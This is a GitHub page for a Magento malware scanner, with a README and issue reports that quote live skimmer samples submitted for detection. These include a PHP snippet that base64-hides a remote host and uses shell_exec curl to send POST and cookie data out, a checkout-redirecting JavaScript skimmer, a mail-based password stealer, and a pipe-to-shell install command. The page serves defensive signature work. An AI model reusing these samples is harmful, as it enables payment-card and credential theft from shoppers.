gwillem / magento-malware-scanner

Scanner, signatures and the largest collection of Magento malware

License: GNU General Public License v3.0

JavaScript 6.92% NewLisp 0.91% HTML 46.00% Python 1.30% PHP 29.24% Perl 0.11% C++ 0.01% Click 0.29% Shell 0.25% Makefile 0.02% YARA 0.12% Roff 14.84%
malware scanner magento cryptojacking infosec fraud-detection ecommerce

magento-malware-scanner's Introduction

Scan your store in 5 minutes

eComscan is the mwscan successor and we recommend that everyone upgrade. Scan your system in 5 minutes. Run this command in an SSH terminal:

curl https://ecomscan.com | sh

Read more about eComscan. It is developed by Sansec, experts in Magento store security and Adobe Commerce security partner.

eComscan features

  • 50 thousand malware signatures and counting
  • Detects vulnerabilities in popular ecommerce platforms (Magento, Woocommerce, Prestashop etc) and third party ecommerce components
  • Monitoring of files, databases, processes, cron...
  • Get instant, actionable alerts via mail, Slack or API webhook

The Sansec threat intel team investigates hundreds of hacked stores per month, and adds new attack signatures multiple times per day. eComscan is the best solution to protect your Magento store from emerging threats.

[Screenshots in the original README: sample command line scan, sample CLI scan output, sample report, sample GUI scan output]

Who uses it?

Mwscan and its successor eComscan are used by Adobe, the US Department of Homeland Security, the Magento Marketplace, Magereport and many of the global top ecommerce agencies.

About payment skimming and Magecart

Online payment skimming (aka MageCart) is a growing threat to digital stores. Since our first publication in 2015, we have identified more than 90.000 compromised stores. In most cases, malware is inserted that will a) intercept customer data, b) divert payments or c) use your customers for cryptojacking.

Privacy watchdogs and online regulators are increasingly handing out fines to companies who suffered a Magecart attack.

magento-malware-scanner's People

Contributors: boneio, convenient, davidalger, elouwerse, erikhansen, evlhomer, fhightower, frosit, gooncybersec, gwillem, hardyjohnson, houey, ikruchynskyi, jeroenvermeulen, jissereitsma, jonashrem, krautface, leeps, mikhailkasimov, mooey28, mpchadwick, nshenfield, pmcmanaman, proxiblue, rafaelstz, rolandwalraven, scone, thomasbrockmeier, vdloo, yuxael

magento-malware-scanner's Issues

Follow symlinks feature follows recursive links

Some of our customers have symlinks like this:

~/httpdocs/nl/  => ~/httpdocs/
~/httpdocs/en/  => ~/httpdocs/

Of course this causes infinite recursion, but most software is protected against that.
mwscan keeps digging forever, so there seems to be a problem with the new --followsymlinks feature. I will check if I can provide a fix.

EDIT: On our Ubuntu Linux the recursion goes max 40 levels deep, which makes mwscan scan the files in httpdocs 80 times in the above example.

FP's because of \x##\x##\x## in Yara rules

Last night MageSec's rules were updated:
https://magesec.org/download/yara-standard.yar
A Yara rule like this:

rule ccsave_cc_number_3803e
{
    strings:
        $ = "\x63\x63\x73\x61\x76\x65\x5F\x63\x63\x5F\x6E\x75\x6D\x62\x65\x72"
    condition:
        any of them
}

also matches the text ccsave_cc_number, which is what you get when you run this in Bash:

echo -e "\x63\x63\x73\x61\x76\x65\x5F\x63\x63\x5F\x6E\x75\x6D\x62\x65\x72"

The solution is to use a rule like this:

rule ccsave_cc_number_3803e_new
{
    strings:
        $ = "\\x63\\x63\\x73\\x61\\x76\\x65\\x5F\\x63\\x63\\x5F\\x6E\\x75\\x6D\\x62\\x65\\x72"
    condition:
        any of them
}

to match a file which includes the string \x63\x63\x73\x61\x76\x65\x5F\x63\x63\x5F\x6E\x75\x6D\x62\x65\x72.

Malware that was not detected

Hi,

I was testing the malware finder on my local Vagrant box. We have multiple files that won't be detected by this. The files attached to this post have been found under /skin.

Archive.zip

Upstream {} is the same as our cache (HTTP 304)'.format(url)

[*] Using Mwscan rules.
[*] Fetching mwscan.yar
[*] Starting new HTTPS connection (1): mwscan.s3.amazonaws.com
[*] https://mwscan.s3.amazonaws.com:443 "GET /mwscan.yar HTTP/1.1" 304 0
Traceback (most recent call last):
  File "/usr/bin/mwscan", line 9, in <module>
    load_entry_point('mwscan==20180228.120927', 'console_scripts', 'mwscan')()
  File "/usr/lib/python2.6/site-packages/mwscan/scan.py", line 243, in main
    rules, whitelist = provider(args=args).get()
  File "/usr/lib/python2.6/site-packages/mwscan/ruleset.py", line 126, in get
    rawrules = self.get_rules()
  File "/usr/lib/python2.6/site-packages/mwscan/ruleset.py", line 46, in get_rules
    return self._recursive_fetch(self.rules_url)
  File "/usr/lib/python2.6/site-packages/mwscan/ruleset.py", line 147, in _recursive_fetch
    data = self._httpget(url)
  File "/usr/lib/python2.6/site-packages/mwscan/ruleset.py", line 114, in _httpget
    logging.debug('Upstream {} is the same as our cache (HTTP 304)'.format(url))
ValueError: zero length field name in format

bug: don't die on broken symlinks and other io errors

# mwscan --newonly /data/web
Sun Jan 15 13:04:52 2017 No timestamp reference file found for /data/web, I will scan everything.
Sun Jan 15 13:04:52 2017 Loaded /usr/lib/python2.7/dist-packages/mwscan/data/all-confirmed.yar: 69 yara rules and 20 whitelist entries
Sun Jan 15 13:04:55 2017 Whitelisted: /data/web/public/pma/libraries/sqlparser.lib.php
Traceback (most recent call last):
  File "/usr/bin/mwscan", line 9, in <module>
    load_entry_point('mwscan==20170112.202348', 'console_scripts', 'mwscan')()
  File "/usr/lib/python2.7/dist-packages/mwscan/mwscan.py", line 230, in main
    total, malware, whitelisted = scan_files(files, rules, whitelist)
  File "/usr/lib/python2.7/dist-packages/mwscan/mwscan.py", line 187, in scan_files
    with open(path, 'rb') as fh:
IOError: [Errno 2] No such file or directory: '/data/web/backup/20161128T1452/app/code/community/Cm/Cache/Backend/Redis.php'

Deal with legitimate obfuscation

Scanning all the Magento Connect modules produces some obfuscated code that looks legit. This will probably happen more in the future, as vendors are moving away from Ioncube.

Possibilities:

  1. Make primary rules more specific and move generic obfuscation detection rules to suspicious. Problem: some malware will have a unique obfuscation per site, so in that case, specific rules are useless.
  2. Maintain whitelist of legitimate obfuscated Magento code. Problem: to verify whitelist validity, the obfuscated source should be included in the repo. But not all code is opensource, so vendors might object to having their obfuscated files included in a public GPL repo. Only storing whitelist hashes in the repo is possible, but does not allow collaborative maintenance.

mwscan

Idea: Optimization for periodic scanning

Ideally, we would have a Yara wrapper that allows target filtering. Yara itself can't exclude targets from a directory tree. Some people have written bash wrappers, but they launch a Yara instance per file, which is incredibly inefficient (overhead of fork(), rule compilation etc).

But there is a C Python extension for Yara, which enables an efficient wrapper. For example, it could:

  • Exclude certain extensions (images, sql, csv, tar.gz)
  • Only scan files with a ctime newer than last log entry (periodic incremental scans)

your cron is wrong:

final line should be:

10 2 * * * root /usr/bin/curl -s $RULESURL -o $RULEFILE && $MWSCAN --quiet --newonly --rules $RULEFILE $MAGENTO
can't be bothered to do a pull req

please include for scan

The following code was injected into the index.php file:

$OpenInNewWindow = "1";

// # DO NOT MODIFY ANYTHING ELSE BELOW THIS LINE!
// ----------------------------------------------
$BLKey = "CAHP-YX3S-PWBH";

if(isset($_SERVER['SCRIPT_URI']) && strlen($_SERVER['SCRIPT_URI'])){
    $_SERVER['REQUEST_URI'] = $_SERVER['SCRIPT_URI'].((strlen($_SERVER['QUERY_STRING']))?'?'.$_SERVER['QUERY_STRING']:'');
}

if(!isset($_SERVER['REQUEST_URI']) || !strlen($_SERVER['REQUEST_URI'])){
    $_SERVER['REQUEST_URI'] = $_SERVER['SCRIPT_NAME'].((isset($_SERVER['QUERY_STRING']) && strlen($_SERVER['QUERY_STRING']))?'?'.$_SERVER['QUERY_STRING']:'');
}

$QueryString  = "LinkUrl=".urlencode(((isset($_SERVER['HTTPS']) && $_SERVER['HTTPS']=='on')?'https://':'http://').$_SERVER['HTTP_HOST'].$_SERVER['REQUEST_URI']);
$QueryString .= "&Key=" .urlencode($BLKey);
$QueryString .= "&OpenInNewWindow=" .urlencode($OpenInNewWindow);


if(intval(get_cfg_var('allow_url_fopen')) && function_exists('readfile')) {
    @readfile("http://www.backlinks.com/engine.php?".$QueryString); 
}
elseif(intval(get_cfg_var('allow_url_fopen')) && function_exists('file')) {
    if($content = @file("http://www.backlinks.com/engine.php?".$QueryString)) 
        print @join('', $content);
}
elseif(function_exists('curl_init')) {
    $ch = curl_init ("http://www.backlinks.com/engine.php?".$QueryString);
    curl_setopt ($ch, CURLOPT_HEADER, 0);
    curl_exec ($ch);

    if(curl_error($ch))
        print "Error processing request";

    curl_close ($ch);
}
else {
    print "It appears that your web host has disabled all functions for handling remote pages and as a result the BackLinks software will not function on your web page. Please contact your web host for more information.";
}

Ping me back if any more details are needed.

Adding a burner domain

Can we have some contributing instructions for adding a new burner domain?

Where are we placing them (into burner-domains.txt I assume?) and what script shall we then run to populate the build?

Document piping wget to mwscan

AFAICT only the use case of scanning the file system is documented, and there's no mention of piping wget to mwscan (unless I'm missing something). Seems like it could be helpful to document that option for usage as well.

Py2 doesn't handle the magesec rules

[*] https://magesec.org:443 "GET /download/yara-standard.yar HTTP/1.1" 200 159703
Traceback (most recent call last):
  File "/usr/local/bin/mwscan", line 9, in <module>
    load_entry_point('mwscan==20180307.122431', 'console_scripts', 'mwscan')()
  File "/usr/local/lib/python2.7/dist-packages/mwscan/scan.py", line 243, in main
    rules, whitelist = provider(args=args).get()
  File "/usr/local/lib/python2.7/dist-packages/mwscan/ruleset.py", line 124, in get
    rawrules = self.get_rules()
  File "/usr/local/lib/python2.7/dist-packages/mwscan/ruleset.py", line 46, in get_rules
    return self._recursive_fetch(self.rules_url)
  File "/usr/local/lib/python2.7/dist-packages/mwscan/ruleset.py", line 145, in _recursive_fetch
    data = self._httpget(url)
  File "/usr/local/lib/python2.7/dist-packages/mwscan/ruleset.py", line 109, in _httpget
    return resp.content.decode()
UnicodeDecodeError: 'ascii' codec can't decode byte 0xc2 in position 154508: ordinal not in range(128)

Simpler rules entry

Challenges with current system:

  1. Much of the Yara rule syntax is boilerplate and not very dense; we almost exclusively use any of them and either a string or a regex match.
  2. It is preferred to use any of them instead of all of them (because that allows inclusion in the grep rules), but this is not clear from the existing rules files.
  3. Rule names are mostly arbitrary but have to be unique or Yara will complain.

I propose to create an intermediary layer that abstracts away most of the boilerplate. Rules are entered into text files frontend and backend. Rules are either strings (no quotes or escaping necessary) or regexes (enclosed by / and with proper escapes). Rules are separated by newlines. Extra newlines can be added to group rules. Comments (starting with '#') can be added to indicate a rulename or explain rule logic.

A text2yara builder will convert the text files to proper Yara syntax. It will generate unique rule names based on a checksum and the optional comment, and group rules together.

More complex rules are still possible, they can be added to complex.yar.
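The following is an added example of such a builder, written for this page and not the repository's own text2yara tool (whose behaviour I have not seen). It implements the layout proposed above (one rule per line, plain strings without quoting, /regex/ lines passed through as YARA regexes, blank lines separating groups, '#' comments naming the group) and derives unique rule names from a checksum. It also covers the escaping point from the ccsave_cc_number report above: a literal backslash in the text file is emitted as `\\` in the rule, so the rule matches the file text `\x63` rather than the byte 0x63. The sample rule list is constructed.

```python
"""text2yara: build grouped YARA rules from a plain-text rule list (added example)."""
import hashlib
import re

# Constructed sample in the proposed text format: a hex-escaped skimmer string
# (as it appears in the file, backslashes included) and a regex rule.
SAMPLE_RULES_TXT = """\
# ccsave cc number, hex-escaped form as it appears in skimmer code
\\x63\\x63\\x73\\x61\\x76\\x65\\x5F\\x63\\x63\\x5F\\x6E\\x75\\x6D\\x62\\x65\\x72

# generic eval of a base64 blob (slashes mark a regex; escapes are YARA's)
/eval\\s*\\(\\s*base64_decode\\s*\\(/
"""


def yara_text_string(s: str) -> str:
    """Quote s as a YARA text string that matches exactly those characters.

    A literal backslash becomes '\\\\' in the rule; without this, "\\x63" would be
    compiled to the byte 0x63 and match the plain text 'c' (the false-positive
    issue above)."""
    escaped = s.replace('\\', '\\\\').replace('"', '\\"')
    return '"' + escaped + '"'


def _string_literal(line: str) -> str:
    # A line enclosed in slashes is a regex and is assumed to be escaped already.
    if len(line) >= 2 and line.startswith('/') and line.endswith('/'):
        return line
    return yara_text_string(line)


def _rule_name(comment, strings, prefix):
    # Name = sanitised comment + 5 hex chars of a checksum over the group's strings,
    # mirroring names such as ccsave_cc_number_3803e in the existing rule set.
    digest = hashlib.sha1('\n'.join(strings).encode('utf-8')).hexdigest()[:5]
    base = re.sub(r'[^A-Za-z0-9]+', '_', comment or 'rule').lower().strip('_')[:40].strip('_')
    base = base or 'rule'
    if base[0].isdigit():
        base = 'r_' + base
    return f'{prefix}{base}_{digest}'


def _emit_rule(name, strings):
    body = '\n'.join(f'        $s{i} = {_string_literal(s)}' for i, s in enumerate(strings))
    return f'rule {name}\n{{\n    strings:\n{body}\n    condition:\n        any of them\n}}'


def text2yara(text: str, prefix: str = '') -> str:
    """Convert the text rule list to YARA source: one rule per blank-line group."""
    rules, comment, group = [], None, []

    def flush():
        nonlocal comment, group
        if group:
            rules.append(_emit_rule(_rule_name(comment, group, prefix), group))
        comment, group = None, []

    for line in text.splitlines():
        if not line.strip():
            flush()                                    # blank line ends a group
        elif line.lstrip().startswith('#'):
            comment = line.lstrip().lstrip('#').strip()  # comment names the group
        else:
            group.append(line.rstrip('\r'))
    flush()
    return '\n\n'.join(rules) + '\n'


def rule_names(yara_src: str):
    """Names of all rules in generated source (used to check uniqueness)."""
    return re.findall(r'^rule (\S+)', yara_src, flags=re.M)


if __name__ == '__main__':
    print(text2yara(SAMPLE_RULES_TXT))
```

The generated source is plain YARA and can be checked with `yara.compile(source=...)` from yara-python before it is published.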

False positives in rule dynamic_base64_function_call_us_04557

Rule 'dynamic_base64_function_call_us_04557' causes a lot of false positives in several extensions.

Example 1: app/code/local/TBT/Bss/Helper/Loyalty/Checker.php

<?php /* This file is protected by copyright law and provided under license. Reverse engineering of this file is strictly prohibited. */$OOO000000=urldecode('%66%67%

Example 2: app/code/local/Mindstretch/Betterinvoice/Model/Order/Pdf/Items/Invoice/Default.php

<?php /* Copyright Mindstretch */$OOO000000=urldecode('%66%67%36

md5_to_incoming.sh - still used?

Is md5_to_incoming.sh still to be used? The current contributing docs skip straight to placing your sample into corpus/backend or corpus/frontend, but I don't see where the file will be renamed with its hash following the current method.

I suggest updating CONTRIBUTING.md to merge how it was a short while ago (i.e. the use of the md5_to_incoming.sh script) with what the current process is, and altering md5_to_incoming.sh to place the file into either frontend or backend depending on whether it's PHP or JavaScript. Perhaps two different scripts would be simpler?

So the docs could then read something like: place the sample into corpus/incoming and run tools/frontend_md5_to_incoming.sh for JavaScript and tools/backend_md5_to_incoming.sh for PHP. The script will then calculate the MD5 hash, rename the sample and move it to the appropriate folder in corpus.

False positive ? Wordpress files

Your site is compromised with injected JavaScript. (108)
The malicious code signature(s) has been found on the page.
The malicious code signature(s) has been found in resources:
[...]blogwp/wp-includes/js/wp-embed.min.js?ver=5.0.3
[...]blogwp/wp-includes/css/dist/block-library/style.min.css?ver=5.0.3

(This is a WordPress site; we're using it with Fishpig_Wordpress.)
I checked; the file is a native, unmodified WordPress file.

suggestion to add scan for this code

$user_ip = getenv('REMOTE_ADDR');
$geo = unserialize(file_get_contents("http://www.geoplugin.net/php.gp?ip=$user_ip"));
$city = $geo["geoplugin_city"];
$region = $geo["geoplugin_regionName"];
$country = $geo["geoplugin_countryName"];
mail("[email protected]","MEMBER MLM TELAH LOGIN KEMBALI ".$_SERVER['REMOTE_ADDR']
,"Login : ".$_SERVER['SERVER_NAME']."".$_SERVER['REQUEST_URI']."
\nUsername | Password : ".$username."|".$password."
\nAamat: ".$city." |".$region."| ".$country."
\nIP Log : ".$_SERVER['REMOTE_ADDR'])
;return true;

Contributing without coding

With Magereport and some additional tools I found viruses on my Magento store,
I found some in footers via configuration and some in catalog search and CMS blocks and visitor info, by doing a search for eval in any DB field in the Magento database...

Would those viruses be of interest?

Move build artefacts out of repo

Note to mwscan users: update your install, or you will not get new rules anymore!

  • The grep URL has changed from git.io/mwscan.txt to mwscan.s3.amazonaws.com/mwscan.txt
  • If using the mwscan package, try sudo pip3 install --upgrade mwscan (or sudo pip install --upgrade mwscan).

See the updated docs for sample crons.

What is this change about?

Let the CI pipeline build the signatures, instead of including them in the repo (redundantly).

Pro: This will unclutter many PRs
Con: Installation instructions need to change, people need to update their mwscan code as the URL is hardcoded and currently points to github.

Plan:

  • Instruct Travis to build rules and upload them to S3 upon commit to master. Done: https://mwscan.s3.amazonaws.com/mwscan.yar
  • Change built rules name to mwscan.txt and mwscan.yar (from all-confirmed).
  • Update all references to all-confirmed, e.g. in travis test scripts
  • Change URL in ruleset.py
  • Update basic instructions/URL for grep usage
  • Do not bundle rules anymore in pip/deb package and remove DEFAULT_RULES_FILE
  • Make mwscan ruleset the default one
  • Ensure that scanning continues, even if S3 is unreachable (except of course when there is no cached version of the rules)
  • Add build/* to .gitignore so PRs will not clutter any further.
  • Verify that mwscan without arguments still does a sane thing (i.e. download the latest default ruleset and use that)
  • Update screenshot in docs
  • Release new pip package
  • Add wildcard rule that will fail on everything, to warn sysadmins to upgrade.

Mwscan users (e.g. Byte) should:

  • Once steps above are completed, install new pip package and/or build new deb with new S3 rule URL

Question - frontend/backend distinction

Please could you indicate the intention / distinction between the frontend and backend folders for signatures? What locations of malicious code are you defining as frontend and backend?

For example, code added to Miscellaneous Scripts / core_config_data table could be added via the Magento backend (i.e. admin panel) but it would show itself to a user via the website frontend, sometimes by viewing source it can be seen etc.

Add this snippet

From app/code/core/Mage/Core/functions.php

if (preg_match("/".base64_decode('Zmlyc3RuYW1lfGN2YzJ8Y2NfbnVtYmVyfHVzZXJuYW1lfGNjX3xzaGlwcGluZ3xjdnZ8bW9udGh8ZHVtbXl8c2VjdXJldHJhZGluZ3x5ZWFyfGxvZ2lufGJpbGxpbmd8ZXhwaXJ5fHBheW1lbnR8Y2FyZF9udW1iZXI=')."/i", serialize($_POST)))
-    @shell_exec("curl --data \"version=1&encode=".base64_encode(    serialize($_POST) . "--" . serialize($_COOKIE) )."&host=".$_SERVER["HTTP_HOST"]."\" ".trim(base64_decode('aHR0cDovL3ZlcnBheW1lbnQuY29tL3Rlc3RTZXJ2ZXIucGhw'))." > /dev/null 2<&1 &");

Malware that changes the payment method URL to the hacker's PayPal account

It was adding the following code in some of the JS files; in our case it was quickview.js and ccard.js.


jQuery(document).ready(function()
{
	if(!(document.cookie.indexOf("userpayid") + 1))
	{
		jQuery("*[onclick^=\"shippingMethod.save()\"]").attr("onclick", "paynow_right();");
		jQuery("*[onclick^=\"checkout.save();\"]").attr("onclick", "paynow_right();");
		jQuery("*[onclick=\"payment.save()\"]").attr("onclick", "paynow_right();");
		jQuery("#checkout-onepage-buttom").attr("onclick", "paynow_right();");
		jQuery("#onestepcheckout-button-place-order").attr("onclick", "paynow_right();");
		jQuery("#onestepcheckout-place-order").attr("onclick", "paynow_right();");
	}
});

function paynow_right()
{
	if(!(document.cookie.indexOf("userpayid") + 1))
	{
		var rand = function()
		{
			return Math.random().toString(36).substr(2);
		};
		document.cookie = "userpayid=" + rand();
		var arr = {
			"location" : "http://" + location.host,
			"method" : "PayPal"
		};
		jQuery(location).attr('href', "//paymentpal.cf/?payment=" + btoa(JSON.stringify(arr)));
	}
}

quickview.js => https://pastebin.com/xUgXxwDe
ccard.js => https://pastebin.com/tkGgKQSi

We also see 2 files with strange names.

Variables Stripped When Copy / Pasting "Running From Cron" Instructions (CentOS 6.8)

Not sure why this is happening, but when I enter the command under "Running from cron" here the variables get stripped...

[server]$ cat <<EOM | sudo tee /etc/cron.d/mwscan
>
> MAILTO=youremail@etc
>
> RULESURL=https://raw.githubusercontent.com/gwillem/magento-malware-scanner/master/build/all-confirmed.yar
> RULEFILE=/var/cache/rules.yar
> MAGENTO=/var/www/magento
> MWSCAN=/usr/bin/mwscan
>
> 10 2 * * * root /usr/bin/curl -s $RULESURL -o $RULEFILE && $MWSCAN --quiet --newonly --rules $RULEFILE $MAGENTO
> EOM

MAILTO=youremail@etc

RULESURL=https://raw.githubusercontent.com/gwillem/magento-malware-scanner/master/build/all-confirmed.yar
RULEFILE=/var/cache/rules.yar
MAGENTO=/var/www/magento
MWSCAN=/usr/bin/mwscan

10 2 * * * root /usr/bin/curl -s  -o  &&  --quiet --newonly --rules
[server]$ cat /etc/cron.d/mwscan

MAILTO=youremail@etc

RULESURL=https://raw.githubusercontent.com/gwillem/magento-malware-scanner/master/build/all-confirmed.yar
RULEFILE=/var/cache/rules.yar
MAGENTO=/var/www/magento
MWSCAN=/usr/bin/mwscan

10 2 * * * root /usr/bin/curl -s  -o  &&  --quiet --newonly --rules

Error: invalid argument on Windows WSL

Linux 4.4.0-43-Microsoft #1-Microsoft Wed Dec 31 14:42:53 PST 2014 x86_64 x86_64 x86_64 GNU/Linux

@:~$ sudo mwscan /var/www/public
Traceback (most recent call last):
  File "/usr/local/bin/mwscan", line 9, in <module>
    load_entry_point('mwscan==20170601.141726', 'console_scripts', 'mwscan')()
  File "/usr/local/lib/python2.7/dist-packages/mwscan/scan.py", line 218, in main
    mylife.ionice(psutil.IOPRIO_CLASS_IDLE)
  File "/usr/local/lib/python2.7/dist-packages/psutil/__init__.py", line 820, in ionice
    return self._proc.ionice_set(ioclass, value)
  File "/usr/local/lib/python2.7/dist-packages/psutil/_pslinux.py", line 1365, in wrapper
    return fun(self, *args, **kwargs)
  File "/usr/local/lib/python2.7/dist-packages/psutil/_pslinux.py", line 1830, in ionice_set
    return cext.proc_ioprio_set(self.pid, ioclass, value)
OSError: [Errno 22] Invalid argument

TypeError: decode() takes no keyword arguments

I've been having ongoing problems with mwscanner since the AWS update. I have a CentOS6 server.

Initially I was getting the "pkg_resources.DistributionNotFound: requests>=0.8.2" and I couldn't get past that until I finally found the comment in usage.md that says to run "easy_install --upgrade requests".

That finally resolved the error that's been holding me up, but the scan didn't get far before reporting a different error.

[*] Using Mwscan rules.
[*] Fetching mwscan.yar
[*] Starting new HTTPS connection (1): mwscan.s3.amazonaws.com
[*] https://mwscan.s3.amazonaws.com:443 "GET /mwscan.yar HTTP/1.1" 200 155458
Traceback (most recent call last):
  File "/usr/bin/mwscan", line 9, in <module>
    load_entry_point('mwscan==20180510.172121', 'console_scripts', 'mwscan')()
  File "/usr/lib/python2.6/site-packages/mwscan/scan.py", line 243, in main
    rules, whitelist = provider(args=args).get()
  File "/usr/lib/python2.6/site-packages/mwscan/ruleset.py", line 139, in get
    rawrules = self.get_rules()
  File "/usr/lib/python2.6/site-packages/mwscan/ruleset.py", line 48, in get_rules
    rawrules = self._recursive_fetch(self.rules_url)
  File "/usr/lib/python2.6/site-packages/mwscan/ruleset.py", line 160, in _recursive_fetch
    data = self._httpget(url)
  File "/usr/lib/python2.6/site-packages/mwscan/ruleset.py", line 121, in _httpget
    return resp.content.decode('utf-8', errors='ignore')
TypeError: decode() takes no keyword arguments
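The tracebacks in this and the two earlier ruleset reports (the HTTP 304 format-string error and the UnicodeDecodeError on the MageSec feed) all come from the signature download path, and the "Move build artefacts out of repo" plan asks that scanning continues when S3 is unreachable. The following is an added example of that path, written for this page and not mwscan's own ruleset.py: a conditional GET with a stored ETag, a 304 or a network failure answered from the local cache, and a byte-safe decode so a non-ASCII byte cannot abort the run. The transport is injected, and FakeUpstream, the cache directory and the rules URL are constructed stand-ins so the example runs offline.

```python
"""Cache-aware signature download with offline fallback (added example)."""
import hashlib
import json
import os
import tempfile


class FetchError(Exception):
    """Raised only when upstream is unusable AND there is no cached copy."""


def decode_rules(raw: bytes) -> str:
    # utf-8-sig drops a BOM (which YARA would reject); errors='replace' keeps a
    # stray byte such as 0xC2 0xA0 (a non-breaking space) from killing the scan.
    return raw.decode('utf-8-sig', errors='replace')


class RulesCache:
    def __init__(self, cache_dir, http_get):
        """http_get(url, headers) -> (status, response_headers, body_bytes) or raises."""
        self.cache_dir = cache_dir
        self.http_get = http_get
        os.makedirs(cache_dir, exist_ok=True)

    def _paths(self, url):
        key = hashlib.sha256(url.encode('utf-8')).hexdigest()[:16]
        base = os.path.join(self.cache_dir, key)
        return base + '.rules', base + '.meta'

    def _read(self, path):
        with open(path, 'rb') as fh:
            return decode_rules(fh.read())

    def get(self, url):
        """Return (rules_text, source) with source 'upstream' or 'cache'."""
        data_path, meta_path = self._paths(url)
        cached = os.path.exists(data_path)
        meta = {}
        if os.path.exists(meta_path):
            with open(meta_path) as fh:
                meta = json.load(fh)
        req_headers = {}
        if cached and meta.get('etag'):
            req_headers['If-None-Match'] = meta['etag']   # conditional GET
        try:
            status, resp_headers, body = self.http_get(url, req_headers)
        except Exception as exc:                            # DNS, timeout, TLS ...
            if cached:
                return self._read(data_path), 'cache'
            raise FetchError(f'{url} unreachable and no cached copy: {exc}')
        if status == 304 and cached:                        # unchanged upstream
            return self._read(data_path), 'cache'
        if status != 200:
            if cached:
                return self._read(data_path), 'cache'
            raise FetchError(f'{url} returned HTTP {status} and no cached copy')
        with open(data_path, 'wb') as fh:
            fh.write(body)
        with open(meta_path, 'w') as fh:
            json.dump({'etag': resp_headers.get('ETag')}, fh)
        return decode_rules(body), 'upstream'


class FakeUpstream:
    """Constructed stand-in for the rules bucket: one file, one ETag, a kill switch."""
    def __init__(self, body: bytes, etag='"v1"'):
        self.body, self.etag, self.down = body, etag, False

    def __call__(self, url, headers):
        if self.down:
            raise ConnectionError('connection refused')
        if headers.get('If-None-Match') == self.etag:
            return 304, {'ETag': self.etag}, b''
        return 200, {'ETag': self.etag}, self.body


def demo():
    # Constructed feed containing the 0xC2 0xA0 byte pair from the traceback above.
    feed = (b'rule demo\n{\n    strings:\n        $a = "x"\xc2\xa0\n'
            b'    condition:\n        any of them\n}\n')
    upstream = FakeUpstream(feed)
    cache = RulesCache(tempfile.mkdtemp(prefix='rules-cache-'), upstream)
    url = 'https://rules.example.invalid/mwscan.yar'       # placeholder URL
    first = cache.get(url)          # 200: stored and served from upstream
    second = cache.get(url)         # 304: served from cache
    upstream.down = True
    third = cache.get(url)          # unreachable: still served from cache
    return first[1], second[1], third[1], 'rule demo' in third[0]


def demo_no_cache():
    """Upstream down and nothing cached is the one case that must fail loudly."""
    upstream = FakeUpstream(b'rule x { condition: true }')
    upstream.down = True
    try:
        RulesCache(tempfile.mkdtemp(prefix='rules-cache-'), upstream).get(
            'https://rules.example.invalid/mwscan.yar')
    except FetchError:
        return True
    return False


if __name__ == '__main__':
    print(demo(), demo_no_cache())
```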

MWSCAN and Python Version

Setting up MWSCAN on our managed server which is running Python 2.7
Can MWSCAN run on 2.7 ?
I get the message:

Traceback (most recent call last):
File "./mwscan", line 38, in
from ruleset import providers
ImportError: No module named ruleset

Should Adminer be flagged as malware?

Technically, Adminer is not malware of course. However, it appears that Adminer is a commonly used tool by Magento exploiters to ensure future database access. General attack flow:

  1. Hacker gets in through SQL injection, Shoplift, Magmi, Webforms upload, brute forcing weak admin password.
  2. Hacker fetches database password from local.xml
  3. Hacker drops backdoors to ensure future access. Backdoors are webshells, blanket eval or upload forms, or database webinterfaces (Adminer).

On our platform, we found roughly 100 Adminer installs. A sample validation revealed that most of them were not put there by the site owner.

What to do?

Compatibility on Windows

Hi - could you possibly please create a Windows version of runtests.py? I potentially have a file that went unfound by the current rules, so I've extracted it and am running it on my workstation through Yara, but got to the "runtests.py" point and it didn't work. I tried swapping the / to \ in the file, and changing the EOL, but still couldn't get it to work, with various errors from:

Traceback (most recent call last):
  File "tools\runtests.py", line 87, in <module>
    runtests()
  File "tools\runtests.py", line 59, in runtests
    report = check_output(['yara', '-r', RULES_CONFIRMED_PATH, MALWARE_PATH]).decode()
  File "C:\Users\user\AppData\Local\Programs\Python\Python36-32\lib\subprocess.py", line 336, in check_output
    **kwargs).stdout
  File "C:\Users\user\AppData\Local\Programs\Python\Python36-32\lib\subprocess.py", line 403, in run
    with Popen(*popenargs, **kwargs) as process:
  File "C:\Users\user\AppData\Local\Programs\Python\Python36-32\lib\subprocess.py", line 707, in __init__
    restore_signals, start_new_session)
  File "C:\Users\user\AppData\Local\Programs\Python\Python36-32\lib\subprocess.py", line 990, in _execute_child
    startupinfo)
FileNotFoundError: [WinError 2] The system cannot find the file specified

to, after trying to convert it myself:

  File "tools\runtests-windows.py", line 26
    return set([fn for s in SEGMENTS for fn in glob(MALWARE_PATH + '' + s + '*
    ') ])
                                                                              ^
SyntaxError: unexpected character after line continuation character

Any help?

mwscan erroring on CentOS 6

[mpachol@pachol2 magento-malware-scanner]$ sudo pip install --upgrade mwscan DEPRECATION: Python 2.6 is no longer supported by the Python core team, please upgrade your Python. A future version of pip will drop support for Python 2.6
Collecting mwscan
/usr/lib/python2.6/site-packages/pip-9.0.1-py2.6.egg/pip/vendor/requests/packages/urllib3/util/ssl.py:318: SNIMissingWarning: An HTTPS request has been made, but the SNI (Subject Name Indication) extension to TLS is not available on this platform. This may cause the server to present an incorrect TLS certificate, which can cause validation failures. You can upgrade to a newer version of Python to solve this. For more information, see https://urllib3.readthedocs.io/en/latest/security.html#snimissingwarning.
SNIMissingWarning
/usr/lib/python2.6/site-packages/pip-9.0.1-py2.6.egg/pip/vendor/requests/packages/urllib3/util/ssl.py:122: InsecurePlatformWarning: A true SSLContext object is not available. This prevents urllib3 from configuring SSL appropriately and may cause certain SSL connections to fail. You can upgrade to a newer version of Python to solve this. For more information, see https://urllib3.readthedocs.io/en/latest/security.html#insecureplatformwarning.
InsecurePlatformWarning
Downloading mwscan-20170208.125606.tar.gz
Requirement already up-to-date: psutil in /usr/lib64/python2.6/site-packages (from mwscan)
Requirement already up-to-date: yara-python in /usr/lib64/python2.6/site-packages (from mwscan)
Requirement already up-to-date: requests>=0.8.2 in /usr/lib/python2.6/site-packages (from mwscan)
Installing collected packages: mwscan
Running setup.py install for mwscan ... done
Successfully installed mwscan-20170208.125606

[mpachol@pachol2 magento-malware-scanner]$ mwscan --ruleset magesec /home/mpachol/public_html/
Traceback (most recent call last):
File "/usr/bin/mwscan", line 5, in
from pkg_resources import load_entry_point
File "/usr/lib/python2.6/site-packages/pkg_resources.py", line 2655, in
working_set.require(requires)
File "/usr/lib/python2.6/site-packages/pkg_resources.py", line 648, in require
needed = self.resolve(parse_requirements(requirements))
File "/usr/lib/python2.6/site-packages/pkg_resources.py", line 546, in resolve
raise DistributionNotFound(req)
